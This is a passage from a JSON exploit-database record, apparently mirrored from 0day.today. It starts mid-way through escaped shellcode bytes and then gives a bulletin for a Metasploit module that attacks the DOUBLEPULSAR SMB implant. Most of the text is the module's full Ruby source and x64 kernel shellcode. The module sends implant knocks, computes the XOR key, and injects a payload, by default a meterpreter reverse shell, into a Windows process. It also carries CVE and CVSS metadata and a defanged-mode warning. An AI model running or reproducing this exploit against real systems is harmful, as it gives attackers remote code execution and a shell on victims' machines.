\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-06T00:18:57", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "95e6cb21b7dce6e0be47676b29636483", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-06T22:17:02", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T00:18:57", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T00:18:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n 